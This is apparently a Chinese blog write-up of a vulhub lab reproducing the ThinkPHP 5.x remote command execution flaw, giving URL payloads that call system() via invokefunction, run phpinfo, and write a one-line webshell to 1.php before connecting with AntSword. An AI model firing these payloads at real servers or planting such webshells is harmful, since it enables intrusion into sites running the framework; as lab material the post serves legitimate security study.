Thinkphp5x远程命令执行靶场攻略

你不要在理我了2024-09-27 17:51

环境配置

靶场：vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场：http://172.16.1.198:8080/

2.远程命令执⾏

POC：

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/16753b4fd3bb4544bdb52b2109a6e6f3.png) #### 3.远程代码执行 POC： ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/6a91a4e3c31e4e63a88d3ab5d65d24cf.png) #### 4.写入一句话木马到根目录下的1.php POC： ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> 1.php ![](https://i-blog.csdnimg.cn/direct/732b49aa73e14b64bf6827488e1fe6d8.png) #### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/400f12233e0e401290c55af68f48328a.png)

上一篇：大数据-146 Apache Kudu 安装运行 Dockerfile 模拟集群启动测试

下一篇：短视频去水印解析api接口使用文档

热门推荐

01扣子（coze）实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解 02Coze扣子平台完整体验和实践（附国内和国际版对比）03KGG转MP3工具|非KGM文件|解密音频 04AI Agent | Coze 插件使用指南：从功能解析到实操步骤 05DeepSeek各版本说明与优缺点分析 06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑 07零代码入门 | Coze——让大模型接入自己的数据库 08YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】09【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高，一键全文降！文件格式不变，公式都保留的！10扣子空间的使用教程与大模型技术思考